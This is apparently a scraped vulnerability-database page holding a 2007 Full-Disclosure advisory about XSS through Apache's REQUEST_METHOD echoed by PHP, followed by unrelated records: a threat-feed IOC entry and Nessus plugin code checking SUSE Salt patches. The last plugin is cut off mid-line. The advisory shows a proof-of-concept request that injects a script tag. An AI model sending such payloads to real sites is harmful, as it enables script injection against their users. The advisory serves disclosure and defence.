ID SECURITYVULNS:DOC:16846 Type securityvulns Reporter Securityvulns Modified 2007-04-25T00:00:00
Description
There exist a flaw in a way how Apache and php combination handle the
$_SERVER array.
If the programmer writes scrip like this:
<?php
echo $_SERVER['REQUEST_METHOD'];
?>
He will assume that REQUEST_METHOD can only by: GET,POST,OPTIONS,TRACE
and all that stuff. However this is not true, since Apache accepts
requests that look like this:
GET<script>alert(document.coookie);</script> /test.php HTTP/1.0
And the output for this would be:
GET<script>alert(document.coookie);</script>
Of course it is hard to exploit (I think some Flash might help ;)) and
I don't know if it is exploitable at all. But programmers should be
warned about this behaviour. You can't trust any variable in the
$_SERVER table!
Regards Michal Majchrowicz.
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
{"id": "SECURITYVULNS:DOC:16846", "bulletinFamily": "software", "title": "[Full-disclosure] Apache/PHP REQUEST_METHOD XSS Vulnerability", "description": "There exist a flaw in a way how Apache and php combination handle the\r\n$_SERVER array.\r\nIf the programmer writes scrip like this:\r\n<?php\r\n echo $_SERVER['REQUEST_METHOD'];\r\n?>\r\nHe will assume that REQUEST_METHOD can only by: GET,POST,OPTIONS,TRACE\r\nand all that stuff. However this is not true, since Apache accepts\r\nrequests that look like this:\r\nGET<script>alert(document.coookie);</script> /test.php HTTP/1.0\r\nAnd the output for this would be:\r\nGET<script>alert(document.coookie);</script>\r\nOf course it is hard to exploit (I think some Flash might help ;)) and\r\nI don't know if it is exploitable at all. But programmers should be\r\nwarned about this behaviour. You can't trust any variable in the\r\n$_SERVER table!\r\nRegards Michal Majchrowicz.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "published": "2007-04-25T00:00:00", "modified": "2007-04-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16846", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:21", "edition": 1, "viewCount": 10, "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2018-08-31T11:10:21", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["REDHAT-RHSA-2019-2538.NASL", "EULEROS_SA-2019-1791.NASL", "PHOTONOS_PHSA-2020-2_0-0237_CEPH.NASL", "UBUNTU_USN-4035-1.NASL", "SUSE_SU-2019-0586-1.NASL", "OPENSUSE-2019-306.NASL", "OPENSUSE-2019-1284.NASL"]}, {"type": "cve", "idList": ["CVE-2008-7273", "CVE-2014-2595", "CVE-2015-9286", "CVE-2008-7272"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191791", "OPENVAS:1361412562310852340", "OPENVAS:1361412562310876295", "OPENVAS:1361412562310852458", "OPENVAS:1361412562310844068"]}, {"type": "redhat", "idList": ["RHSA-2019:2541", "RHSA-2019:2538"]}, {"type": "ubuntu", "idList": ["USN-4035-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1284-1"]}], "modified": "2018-08-31T11:10:21", "rev": 2}, "vulnersScore": 5.2}, "affectedSoftware": []}
{"rst": [{"lastseen": "2020-12-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **216[.]147.174.91** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2020-12-09T03:00:00, Last seen: 2020-12-17T03:00:00.\n IOC tags: **shellprobe**.\nASN 16846: (First IP 216.147.174.0, Last IP 216.147.174.255).\nASN Name \"HPNWFNDNET\" and Organisation \"High Point Networks\".\nASN hosts 0 domains.\nGEO IP information: City \"Bismarck\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-09T00:00:00", "id": "RST:4107AD10-CC43-3D3A-A5B7-7183A18C32D8", "href": "", "published": "2020-12-18T00:00:00", "title": "RST Threat feed. IOC: 216.147.174.91", "type": "rst", "cvss": {}}], "nessus": [{"lastseen": "2020-12-12T14:48:43", "description": "This update fixes the following issues :\n\nsalt :\n\nAvoid regression on 'salt-master': set passphrase for salt-ssh keys to\nempty string (bsc#1178485)\n\nProperly validate eauth credentials and tokens on SSH calls made by\nSalt API (bsc#1178319, bsc#1178362, bsc#1178361, CVE-2020-25592,\nCVE-2020-17490, CVE-2020-16846)\n\nFix disk.blkid to avoid unexpected keyword argument '__pub_user'\n(bsc#1177867)\n\nEnsure virt.update stop_on_reboot is updated with its default value\n\nDo not break package building for systemd OSes\n\nDrop wrong mock from chroot unit test\n\nSupport systemd versions with dot (bsc#1176294)\n\nFix for grains.test_core unit test\n\nFix file/directory user and group ownership containing UTF-8\ncharacters (bsc#1176024)\n\nSeveral changes to virtualization :\n\n - Fix virt update when cpu and memory are changed\n\n - Memory Tuning GSoC\n\n - Properly fix memory setting regression in virt.update\n\n - Expose libvirt on_reboot in virt states\n\nSupport transactional systems (MicroOS)\n\nZypperpkg module ignores retcode 104 for search() (bsc#1159670)\n\nXen disk fixes. No longer generates volumes for Xen disks, but the\ncorresponding file or block disk (bsc#1175987)\n\nInvalidate file list cache when cache file modified time is in the\nfuture (bsc#1176397)\n\nPrevent import errors when running test_btrfs unit tests\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 2, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-09T00:00:00", "title": "SUSE SLES15 Security Update : Salt (SUSE-SU-2020:3244-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "modified": "2020-12-09T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-proxy", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt-syndic", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-api"], "id": "SUSE_SU-2020-3244-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143761", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:3244-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143761);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/11\");\n\n script_cve_id(\"CVE-2020-16846\", \"CVE-2020-17490\", \"CVE-2020-25592\");\n\n script_name(english:\"SUSE SLES15 Security Update : Salt (SUSE-SU-2020:3244-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update fixes the following issues :\n\nsalt :\n\nAvoid regression on 'salt-master': set passphrase for salt-ssh keys to\nempty string (bsc#1178485)\n\nProperly validate eauth credentials and tokens on SSH calls made by\nSalt API (bsc#1178319, bsc#1178362, bsc#1178361, CVE-2020-25592,\nCVE-2020-17490, CVE-2020-16846)\n\nFix disk.blkid to avoid unexpected keyword argument '__pub_user'\n(bsc#1177867)\n\nEnsure virt.update stop_on_reboot is updated with its default value\n\nDo not break package building for systemd OSes\n\nDrop wrong mock from chroot unit test\n\nSupport systemd versions with dot (bsc#1176294)\n\nFix for grains.test_core unit test\n\nFix file/directory user and group ownership containing UTF-8\ncharacters (bsc#1176024)\n\nSeveral changes to virtualization :\n\n - Fix virt update when cpu and memory are changed\n\n - Memory Tuning GSoC\n\n - Properly fix memory setting regression in virt.update\n\n - Expose libvirt on_reboot in virt states\n\nSupport transactional systems (MicroOS)\n\nZypperpkg module ignores retcode 104 for search() (bsc#1159670)\n\nXen disk fixes. No longer generates volumes for Xen disks, but the\ncorresponding file or block disk (bsc#1175987)\n\nInvalidate file list cache when cache file modified time is in the\nfuture (bsc#1176397)\n\nPrevent import errors when running test_btrfs unit tests\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1159670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1175987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176024\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1177867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178361\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-16846/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-17490/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-25592/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20203244-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1bfec39b\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-3244=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-3244=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-3244=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-3244=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python2-salt-3000-5.91.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python3-salt-3000-5.91.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-3000-5.91.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-api-3000-5.91.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-cloud-3000-5.91.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-doc-3000-5.91.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-master-3000-5.91.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-minion-3000-5.91.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-proxy-3000-5.91.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-ssh-3000-5.91.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-standalone-formulas-configuration-3000-5.91.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-syndic-3000-5.91.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-14T06:30:27", "description": "This update for salt fixes the following issues :\n\nAvoid regression on 'salt-master': set passphrase for salt-ssh keys to\nempty string (bsc#1178485)\n\nProperly validate eauth credentials and tokens on SSH calls made by\nSalt API (bsc#1178319, bsc#1178362, bsc#1178361, CVE-2020-25592,\nCVE-2020-17490, CVE-2020-16846)\n\nFix disk.blkid to avoid unexpected keyword argument '__pub_user'.\n(bsc#1177867)\n\nEnsure virt.update stop_on_reboot is updated with its default value.\n\nDo not break package building for systemd OSes.\n\nDrop wrong mock from chroot unit test.\n\nSupport systemd versions with dot. (bsc#1176294)\n\nFix for grains.test_core unit test.\n\nFix file/directory user and group ownership containing UTF-8\ncharacters. (bsc#1176024)\n\nSeveral changes to virtualization :\n\n - Fix virt update when cpu and memory are changed.\n\n - Memory Tuning GSoC.\n\n - Properly fix memory setting regression in virt.update.\n\n - Expose libvirt on_reboot in virt states.\n\nSupport transactional systems (MicroOS).\n\nzypperpkg module ignores retcode 104 for search(). (bsc#1159670)\n\nXen disk fixes. No longer generates volumes for Xen disks, but the\ncorresponding file or block disk. (bsc#1175987)\n\nInvalidate file list cache when cache file modified time is in the\nfuture. (bsc#1176397)\n\nPrevent import errors when running test_btrfs unit tests\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 3, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-09T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:3243-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "modified": "2020-12-09T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-proxy", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt-syndic", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-api"], "id": "SUSE_SU-2020-3243-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143632", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:3243-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143632);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2020-16846\", \"CVE-2020-17490\", \"CVE-2020-25592\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:3243-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for salt fixes the following issues :\n\nAvoid regression on 'salt-master': set passphrase for salt-ssh keys to\nempty string (bsc#1178485)\n\nProperly validate eauth credentials and tokens on SSH calls made by\nSalt API (bsc#1178319, bsc#1178362, bsc#1178361, CVE-2020-25592,\nCVE-2020-17490, CVE-2020-16846)\n\nFix disk.blkid to avoid unexpected keyword argument '__pub_user'.\n(bsc#1177867)\n\nEnsure virt.update stop_on_reboot is updated with its default value.\n\nDo not break package building for systemd OSes.\n\nDrop wrong mock from chroot unit test.\n\nSupport systemd versions with dot. (bsc#1176294)\n\nFix for grains.test_core unit test.\n\nFix file/directory user and group ownership containing UTF-8\ncharacters. (bsc#1176024)\n\nSeveral changes to virtualization :\n\n - Fix virt update when cpu and memory are changed.\n\n - Memory Tuning GSoC.\n\n - Properly fix memory setting regression in virt.update.\n\n - Expose libvirt on_reboot in virt states.\n\nSupport transactional systems (MicroOS).\n\nzypperpkg module ignores retcode 104 for search(). (bsc#1159670)\n\nXen disk fixes. No longer generates volumes for Xen disks, but the\ncorresponding file or block disk. (bsc#1175987)\n\nInvalidate file list cache when cache file modified time is in the\nfuture. (bsc#1176397)\n\nPrevent import errors when running test_btrfs unit tests\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1159670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1175987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176024\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1177867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178361\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-16846/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-17490/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-25592/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20203243-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f0c8f502\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP1 :\n\nzypper in -t patch\nSUSE-SLE-Module-Server-Applications-15-SP1-2020-3243=1\n\nSUSE Linux Enterprise Module for Python2 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Python2-15-SP1-2020-3243=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP1-2020-3243=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python2-salt-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python3-salt-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-api-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-cloud-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-doc-3000-6.51.1\")) flag++;\nif 